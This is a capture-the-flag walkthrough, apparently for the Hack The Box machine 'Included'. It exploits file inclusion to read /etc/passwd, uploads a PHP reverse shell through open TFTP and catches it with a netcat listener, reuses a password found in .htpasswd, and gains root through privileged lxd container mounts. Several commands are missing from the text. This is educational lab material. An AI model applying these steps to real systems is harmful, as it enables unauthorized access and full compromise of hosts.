As usual, let's start with nmap:
nmap -sV -sC 10.129.166.191
Let's also do an udp scan too using:
sudo nmap -sU 10.129.166.191
Enter your password
udp scans takes a lot longer than the usual tcp scans, be patient. Also, udp scans require to use sudo
Note that port 69 udp is open, which is associated with tftp.
Port 80 is open, so let's check the website by going to : http://10.129.166.191
Even though I typed http://10.129.166.191, I got redirected to http://10.129.166.191/?file=home.php
This looks like file inclusion, explaining the name of the machine "included"
Let's try it. Let's see if we can access the file /etc/passwd using http://10.129.166.191/?file=/etc/passwd
Using curl, we can have a nicer display of users
What is the /etc/passwd file?
The /etc/passwd file keeps track of all the registered users on the system. It is a colon-separated file ( : )
It contains, in this order, user name, encrypted password, UID, GID, user home directory, login shell
The file /etc/passwd is owned by the root user but must be readable by all users. Only root can write this file.
Then encrypted passwords are stored in /etc/security/passwd file
Earlier, we found from the udp scan that udp port 69/udp is open, which is associated with tftp
Let's install tftp first using:
sudo apt install tftp
Once installed, type:
By default TFTP works without the need for authentication, meaning that anyone can upload and download files from the remote system!
Open a new command prompt window and type:
We are interested in php-reverse-shell.php. Let's make a copy first, called shell.php
sudo cp php-reverse-shell.php shell.php
Let's now move shell.php to our home directory
sudo mv shell.php /home/htb-sneakymouse/
Your home directory will be different
Now open a new command prompt window and type:
We can see shell.php is now here in our home directory
Now let's edit this shell.php file using:
sudo nano shell.php
Scroll down until you see:
We need to change the $ip to the IP of our VM
if you don't know the IP of your VM, open a new command prompt window and type ifconfig
We need to change the $port to 4444 (this is because we will set up our netcat listener on port 4444)
When done, use:
Now that we have shell.php ready, we need to upload it to the target using tftp. Go back to your tftp session and type:
Make sure you are in your home directory for the command above, as we will now upload shell.php
Now that we have uploaded our file we can just quit:
Now let's open a new command prompt window and set up our netcat listener on port 4444
nc -lnvp 4444
Now go the url http://10.129.166.191/?file=/var/lib/tftpboot/shell.php
Nothing happens but this is triggering the shell.php file on the target machine. Now go back to your netcat and you should have a connection:
We got the shell! Let's upgrade the shell using:
python3 -c 'import pty;pty.spawn("/bin/bash")'
We are www-data and we are not allowed to read user.txt in mike directory
Let's look for some credentials in:
.htpasswd is where we store the password for the website
We got the password! Maybe mike is using the same password to access the system
When prompted for the password, type:
We got in and we are now Mike
Congratulations! You got the user flag!
mike was not granted sudo right on the machine
Let's google lxd and lxd privilege escalation. We find that we can escalate our privileges using lxd. With lxd, we can run system containers. system containers are like a full OS, almost like a VM.
From you VM, open a new command prompt window and follow the steps below:
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
--> this installs the Go programming languages along with some other required packages
git clone https://github.com/lxc/distrobuilder
--> this downloads a copy of distrobuilder. We need distrobuilder to create container images for lxd
--> distrobuilder has been built successfully!
Create a new directory called ContainerImages and a directory inside it called alpine using:
Let's also download the alpine.yaml file using:
Let's now build it:
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8
when done you should have something like this
we now have lxd.tar.xz and rootfs.squashfs
Let's create a web service on port 8000 on our VM using:
python3 -m http.server 8000
Now let's switch back to the shell on the target.
--> this go retrieve the rootfs.squashfs from the webserver we just created on our VM and download the file to the target machine
--> this go retrieve the lxd.tar.xz from the webserver we just created on our VM and download the file to the target machine
Now the files are on the target machine!
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
--> this import the image and call it with the alias alpine
lxc image list
--> we use this command to make sure the image has been imported properly
lxc init alpine privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
We got a shell! not the prettiest shell but that will do!
Congratulations! You got the root flag!